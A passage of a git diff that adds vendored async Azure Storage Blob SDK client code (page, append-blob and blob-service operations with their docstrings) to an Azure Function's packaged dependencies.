+ As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._upload_page_options( + page=page, + offset=offset, + length=length, + **kwargs) + try: + return await self._client.page_blob.upload_pages(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def upload_pages_from_url(self, source_url, # type: str + offset, # type: int + length, # type: int + source_offset, # type: int + **kwargs + ): + # type: (...) -> Dict[str, Any] + """ + The Upload Pages operation writes a range of pages to a page blob where + the contents are read from a URL. + + :param str source_url: + The URL of the source data. It can point to any Azure Blob or File, that is either public or has a + shared access signature attached. + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int source_offset: + This indicates the start of the range of bytes(inclusive) that has to be taken from the copy source. + The service will read the same number of bytes as the destination range (length-offset). + :keyword bytes source_content_md5: + If given, the service will calculate the MD5 hash of the block content and compare against this value. + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword lease: + Required if the blob has an active lease. 
Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + + options = self._upload_pages_from_url_options( + source_url=self._encode_source_url(source_url), + offset=offset, + length=length, + source_offset=source_offset, + **kwargs + ) + try: + return await self._client.page_blob.upload_pages_from_url(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def clear_page(self, offset, length, **kwargs): + # type: (int, int, Any) -> Dict[str, Union[str, datetime]] + """Clears a range of pages. + + :param int offset: + Start of byte range to use for writing to a section of the blob. 
+ Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._clear_page_options(offset, length, **kwargs) + try: + return await self._client.page_blob.clear_pages(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def append_block( # type: ignore + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """Commits a new block of data to the end of the existing append blob. + + :param data: + Content of the block. + :param int length: + Size of the block in bytes. + :keyword bool validate_content: + If true, calculates an MD5 hash of the block content. 
The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag, last modified, append offset, committed block count). 
+ :rtype: dict(str, Any) + """ + options = self._append_block_options( + data, + length=length, + **kwargs + ) + try: + return await self._client.append_blob.append_block(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async() + async def append_block_from_url(self, copy_source_url, # type: str + source_offset=None, # type: Optional[int] + source_length=None, # type: Optional[int] + **kwargs): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """ + Creates a new block to be committed as part of a blob, where the contents are read from a source url. + + :param str copy_source_url: + The URL of the source data. It can point to any Azure Blob or File, that is either public or has a + shared access signature attached. + :param int source_offset: + This indicates the start of the range of bytes(inclusive) that has to be taken from the copy source. + :param int source_length: + This indicates the end of the range of bytes that has to be taken from the copy source. + :keyword bytearray source_content_md5: + If given, the service will calculate the MD5 hash of the block content and compare against this value. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the + AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.aio.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. 
Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._append_block_from_url_options( + copy_source_url=self._encode_source_url(copy_source_url), + source_offset=source_offset, + source_length=source_length, + **kwargs + ) + try: + return await self._client.append_blob.append_block_from_url(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async() + async def seal_append_blob(self, **kwargs): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """The Seal operation seals the Append Blob to make it read-only. + + .. versionadded:: 12.4.0 + + :keyword int appendpos_condition: + Optional conditional header, used only for the Append Block operation. + A number indicating the byte offset to compare. Append Block will + succeed only if the append position is equal to this number. If it + is not, the request will fail with the AppendPositionConditionNotMet error + (HTTP status code 412 - Precondition Failed). + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. 
+ Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag, last modified, append offset, committed block count). + :rtype: dict(str, Any) + """ + options = self._seal_append_blob_options(**kwargs) + try: + return await self._client.append_blob.seal(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _get_container_client(self): # pylint: disable=client-method-missing-kwargs + # type: (...) -> ContainerClient + """Get a client to interact with the blob's parent container. + + The container need not already exist. Defaults to current blob's credentials. + + :returns: A ContainerClient. + :rtype: ~azure.storage.blob.ContainerClient + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_containers_async.py + :start-after: [START get_container_client_from_blob_client] + :end-before: [END get_container_client_from_blob_client] + :language: python + :dedent: 12 + :caption: Get container client from blob object. + """ + from ._container_client_async import ContainerClient + if not isinstance(self._pipeline._transport, AsyncTransportWrapper): # pylint: disable = protected-access + _pipeline = AsyncPipeline( + transport=AsyncTransportWrapper(self._pipeline._transport), # pylint: disable = protected-access + policies=self._pipeline._impl_policies # pylint: disable = protected-access + ) + else: + _pipeline = self._pipeline # pylint: disable = protected-access + return ContainerClient( + "{}://{}".format(self.scheme, self.primary_hostname), container_name=self.container_name, + credential=self._raw_credential, api_version=self.api_version, _configuration=self._config, + _location_mode=self._location_mode, _hosts=self._hosts, require_encryption=self.require_encryption, + _pipeline=_pipeline, key_encryption_key=self.key_encryption_key, + key_resolver_function=self.key_resolver_function) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_service_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_service_client_async.py new file mode 100644 index 0000000..3b740b9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_blob_service_client_async.py @@ -0,0 +1,682 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# -------------------------------------------------------------------------- +# pylint: disable=invalid-overridden-method +import functools +import warnings +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, Dict, List, + TYPE_CHECKING +) + +from azure.core.exceptions import HttpResponseError +from azure.core.tracing.decorator import distributed_trace +from azure.core.pipeline import AsyncPipeline +from azure.core.tracing.decorator_async import distributed_trace_async +from azure.core.async_paging import AsyncItemPaged + +from .._shared.models import LocationMode +from .._shared.policies_async import ExponentialRetry +from .._shared.base_client_async import AsyncStorageAccountHostsMixin, AsyncTransportWrapper +from .._shared.response_handlers import return_response_headers, process_storage_error +from .._shared.parser import _to_utc_datetime +from .._shared.response_handlers import parse_to_internal_user_delegation_key +from .._generated.aio import AzureBlobStorage +from .._generated.models import StorageServiceProperties, KeyInfo +from .._blob_service_client import BlobServiceClient as BlobServiceClientBase +from ._container_client_async import ContainerClient +from ._blob_client_async import BlobClient +from .._models import ContainerProperties +from .._deserialize import service_stats_deserialize, service_properties_deserialize +from .._serialize import get_api_version +from ._models import ContainerPropertiesPaged, FilteredBlobPaged + +if TYPE_CHECKING: + from datetime import datetime + from .._shared.models import AccountSasPermissions, ResourceTypes, UserDelegationKey + from ._lease_async import BlobLeaseClient + from .._models import ( + BlobProperties, + PublicAccess, + BlobAnalyticsLogging, + Metrics, + CorsRule, + RetentionPolicy, + StaticWebsite, + ) + + +class BlobServiceClient(AsyncStorageAccountHostsMixin, BlobServiceClientBase): + """A client to interact with the Blob Service at the account level. + + This client provides operations to retrieve and configure the account properties + as well as list, create and delete containers within the account. + For operations relating to a specific container or blob, clients for those entities + can also be retrieved using the `get_client` functions. + + :param str account_url: + The URL to the blob storage account. Any other entities included + in the URL path (e.g. container or blob) will be discarded. This URL can be optionally + authenticated with a SAS token. + :param credential: + The credentials with which to authenticate. This is optional if the + account URL already has a SAS token. The value can be a SAS token string, + an instance of a AzureSasCredential from azure.core.credentials, an account + shared access key, or an instance of a TokenCredentials class from azure.identity. + If the resource URI already contains a SAS token, this will be ignored in favor of an explicit credential + - except in the case of AzureSasCredential, where the conflicting SAS tokens will raise a ValueError. + :keyword str api_version: + The Storage API version to use for requests. Default value is the most recent service version that is + compatible with the current SDK. Setting to an older version may result in reduced feature compatibility. + + .. versionadded:: 12.2.0 + + :keyword str secondary_hostname: + The hostname of the secondary endpoint. + :keyword int max_block_size: The maximum chunk size for uploading a block blob in chunks. + Defaults to 4*1024*1024, or 4MB. 
+ :keyword int max_single_put_size: If the blob size is less than or equal max_single_put_size, then the blob will be + uploaded with only one http PUT request. If the blob size is larger than max_single_put_size, + the blob will be uploaded in chunks. Defaults to 64*1024*1024, or 64MB. + :keyword int min_large_block_upload_threshold: The minimum chunk size required to use the memory efficient + algorithm when uploading a block blob. Defaults to 4*1024*1024+1. + :keyword bool use_byte_buffer: Use a byte buffer for block blob uploads. Defaults to False. + :keyword int max_page_size: The maximum chunk size for uploading a page blob. Defaults to 4*1024*1024, or 4MB. + :keyword int max_single_get_size: The maximum size for a blob to be downloaded in a single call, + the exceeded part will be downloaded in chunks (could be parallel). Defaults to 32*1024*1024, or 32MB. + :keyword int max_chunk_get_size: The maximum chunk size used for downloading a blob. Defaults to 4*1024*1024, + or 4MB. + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_authentication_async.py + :start-after: [START create_blob_service_client] + :end-before: [END create_blob_service_client] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient with account url and credential. + + .. literalinclude:: ../samples/blob_samples_authentication_async.py + :start-after: [START create_blob_service_client_oauth] + :end-before: [END create_blob_service_client_oauth] + :language: python + :dedent: 8 + :caption: Creating the BlobServiceClient with Azure Identity credentials. + """ + + def __init__( + self, account_url, # type: str + credential=None, # type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + kwargs['retry_policy'] = kwargs.get('retry_policy') or ExponentialRetry(**kwargs) + super(BlobServiceClient, self).__init__( + account_url, + credential=credential, + **kwargs) + self._client = AzureBlobStorage(self.url, base_url=self.url, pipeline=self._pipeline) + self._client._config.version = get_api_version(kwargs) # pylint: disable=protected-access + + @distributed_trace_async + async def get_user_delegation_key(self, key_start_time, # type: datetime + key_expiry_time, # type: datetime + **kwargs # type: Any + ): + # type: (...) -> UserDelegationKey + """ + Obtain a user delegation key for the purpose of signing SAS tokens. + A token credential must be present on the service object for this request to succeed. + + :param ~datetime.datetime key_start_time: + A DateTime value. Indicates when the key becomes valid. + :param ~datetime.datetime key_expiry_time: + A DateTime value. Indicates when the key stops being valid. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: The user delegation key. + :rtype: ~azure.storage.blob.UserDelegationKey + """ + key_info = KeyInfo(start=_to_utc_datetime(key_start_time), expiry=_to_utc_datetime(key_expiry_time)) + timeout = kwargs.pop('timeout', None) + try: + user_delegation_key = await self._client.service.get_user_delegation_key(key_info=key_info, + timeout=timeout, + **kwargs) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + return parse_to_internal_user_delegation_key(user_delegation_key) # type: ignore + + @distributed_trace_async + async def get_account_information(self, **kwargs): + # type: (Any) -> Dict[str, str] + """Gets information related to the storage account. + + The information can also be retrieved if the user has a SAS to a container or blob. 
+        The keys in the returned dictionary include 'sku_name' and 'account_kind'.
+
+        :returns: A dict of account information (SKU and account type).
+        :rtype: dict(str, str)
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_service_async.py
+                :start-after: [START get_blob_service_account_info]
+                :end-before: [END get_blob_service_account_info]
+                :language: python
+                :dedent: 12
+                :caption: Getting account information for the blob service.
+        """
+        try:
+            return await self._client.service.get_account_info(cls=return_response_headers, **kwargs) # type: ignore
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    @distributed_trace_async
+    async def get_service_stats(self, **kwargs):
+        # type: (Any) -> Dict[str, Any]
+        """Retrieves statistics related to replication for the Blob service.
+
+        It is only available when read-access geo-redundant replication is enabled for
+        the storage account.
+
+        With geo-redundant replication, Azure Storage maintains your data durably
+        in two locations. In both locations, Azure Storage constantly maintains
+        multiple healthy replicas of your data. The location where you read,
+        create, update, or delete data is the primary storage account location.
+        The primary location exists in the region you choose at the time you
+        create an account via the Azure portal, for
+        example, North Central US. The location to which your data is replicated
+        is the secondary location. The secondary location is automatically
+        determined based on the location of the primary; it is in a second data
+        center that resides in the same region as the primary location. Read-only
+        access is available from the secondary location, if read-access geo-redundant
+        replication is enabled for your storage account.
+
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :return: The blob service stats.
+        :rtype: Dict[str, Any]
+
+        .. admonition:: Example:
+
+            .. literalinclude:: ../samples/blob_samples_service_async.py
+                :start-after: [START get_blob_service_stats]
+                :end-before: [END get_blob_service_stats]
+                :language: python
+                :dedent: 12
+                :caption: Getting service stats for the blob service.
+        """
+        timeout = kwargs.pop('timeout', None)
+        try:
+            stats = await self._client.service.get_statistics( # type: ignore
+                timeout=timeout, use_location=LocationMode.SECONDARY, **kwargs)
+            return service_stats_deserialize(stats)
+        except HttpResponseError as error:
+            process_storage_error(error)
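A combined sketch of the two account-level reads above may help; it is an editorial addition, not part of the patch. The connection string is a placeholder, and `get_service_stats` only succeeds on accounts with read-access geo-redundant replication (RA-GRS) enabled.

```python
import asyncio

from azure.storage.blob.aio import BlobServiceClient


async def main():
    service = BlobServiceClient.from_connection_string("<connection-string>")
    async with service:
        info = await service.get_account_information()
        print(info["sku_name"], info["account_kind"])

        # Requires RA-GRS replication on the account.
        stats = await service.get_service_stats()
        print(stats["geo_replication"]["status"])

asyncio.run(main())
```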
+ """ + timeout = kwargs.pop('timeout', None) + try: + service_props = await self._client.service.get_properties(timeout=timeout, **kwargs) + return service_properties_deserialize(service_props) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace_async + async def set_service_properties( + self, analytics_logging=None, # type: Optional[BlobAnalyticsLogging] + hour_metrics=None, # type: Optional[Metrics] + minute_metrics=None, # type: Optional[Metrics] + cors=None, # type: Optional[List[CorsRule]] + target_version=None, # type: Optional[str] + delete_retention_policy=None, # type: Optional[RetentionPolicy] + static_website=None, # type: Optional[StaticWebsite] + **kwargs + ): + # type: (...) -> None + """Sets the properties of a storage account's Blob service, including + Azure Storage Analytics. + + If an element (e.g. analytics_logging) is left as None, the + existing settings on the service for that functionality are preserved. + + :param analytics_logging: + Groups the Azure Analytics Logging settings. + :type analytics_logging: ~azure.storage.blob.BlobAnalyticsLogging + :param hour_metrics: + The hour metrics settings provide a summary of request + statistics grouped by API in hourly aggregates for blobs. + :type hour_metrics: ~azure.storage.blob.Metrics + :param minute_metrics: + The minute metrics settings provide request statistics + for each minute for blobs. + :type minute_metrics: ~azure.storage.blob.Metrics + :param cors: + You can include up to five CorsRule elements in the + list. If an empty list is specified, all CORS rules will be deleted, + and CORS will be disabled for the service. + :type cors: list[~azure.storage.blob.CorsRule] + :param str target_version: + Indicates the default version to use for requests if an incoming + request's version is not specified. + :param delete_retention_policy: + The delete retention policy specifies whether to retain deleted blobs. + It also specifies the number of days and versions of blob to keep. + :type delete_retention_policy: ~azure.storage.blob.RetentionPolicy + :param static_website: + Specifies whether the static website feature is enabled, + and if yes, indicates the index document and 404 error document to use. + :type static_website: ~azure.storage.blob.StaticWebsite + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START set_blob_service_properties] + :end-before: [END set_blob_service_properties] + :language: python + :dedent: 12 + :caption: Setting service properties for the blob service. 
+ """ + if all(parameter is None for parameter in [ + analytics_logging, hour_metrics, minute_metrics, cors, + target_version, delete_retention_policy, static_website]): + raise ValueError("set_service_properties should be called with at least one parameter") + + props = StorageServiceProperties( + logging=analytics_logging, + hour_metrics=hour_metrics, + minute_metrics=minute_metrics, + cors=cors, + default_service_version=target_version, + delete_retention_policy=delete_retention_policy, + static_website=static_website + ) + timeout = kwargs.pop('timeout', None) + try: + await self._client.service.set_properties(props, timeout=timeout, **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def list_containers( + self, name_starts_with=None, # type: Optional[str] + include_metadata=False, # type: Optional[bool] + **kwargs + ): + # type: (...) -> AsyncItemPaged[ContainerProperties] + """Returns a generator to list the containers under the specified account. + + The generator will lazily follow the continuation tokens returned by + the service and stop when all containers have been returned. + + :param str name_starts_with: + Filters the results to return only containers whose names + begin with the specified prefix. + :param bool include_metadata: + Specifies that container metadata to be returned in the response. + The default value is `False`. + :keyword bool include_deleted: + Specifies that deleted containers to be returned in the response. This is for container restore enabled + account. The default value is `False`. + .. versionadded:: 12.4.0 + :keyword bool include_system: + Flag specifying that system containers should be included. + .. versionadded:: 12.10.0 + :keyword int results_per_page: + The maximum number of container names to retrieve per API + call. If the request does not specify the server will return up to 5,000 items. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) of ContainerProperties. + :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.ContainerProperties] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_service_async.py + :start-after: [START bsc_list_containers] + :end-before: [END bsc_list_containers] + :language: python + :dedent: 16 + :caption: Listing the containers in the blob service. + """ + include = ['metadata'] if include_metadata else [] + include_deleted = kwargs.pop('include_deleted', None) + if include_deleted: + include.append("deleted") + include_system = kwargs.pop('include_system', None) + if include_system: + include.append("system") + timeout = kwargs.pop('timeout', None) + results_per_page = kwargs.pop('results_per_page', None) + command = functools.partial( + self._client.service.list_containers_segment, + prefix=name_starts_with, + include=include, + timeout=timeout, + **kwargs) + return AsyncItemPaged( + command, + prefix=name_starts_with, + results_per_page=results_per_page, + page_iterator_class=ContainerPropertiesPaged + ) + + @distributed_trace + def find_blobs_by_tags(self, filter_expression, **kwargs): + # type: (str, **Any) -> AsyncItemPaged[FilteredBlob] + """The Filter Blobs operation enables callers to list blobs across all + containers whose tags match a given search expression. Filter blobs + searches across all containers within a storage account but can be + scoped within the expression to a single container. 
+    @distributed_trace
+    def find_blobs_by_tags(self, filter_expression, **kwargs):
+        # type: (str, **Any) -> AsyncItemPaged[FilteredBlob]
+        """The Filter Blobs operation enables callers to list blobs across all
+        containers whose tags match a given search expression. Filter blobs
+        searches across all containers within a storage account but can be
+        scoped within the expression to a single container.
+
+        :param str filter_expression:
+            The expression to find blobs whose tags match the specified condition.
+            e.g. "\"yourtagname\"='firsttag' and \"yourtagname2\"='secondtag'"
+            To specify a container, e.g. "@container='containerName' and \"Name\"='C'"
+        :keyword int results_per_page:
+            The max result per page when paginating.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: An iterable (auto-paging) response of FilteredBlob.
+        :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.storage.blob.FilteredBlob]
+        """
+
+        results_per_page = kwargs.pop('results_per_page', None)
+        timeout = kwargs.pop('timeout', None)
+        command = functools.partial(
+            self._client.service.filter_blobs,
+            where=filter_expression,
+            timeout=timeout,
+            **kwargs)
+        return AsyncItemPaged(
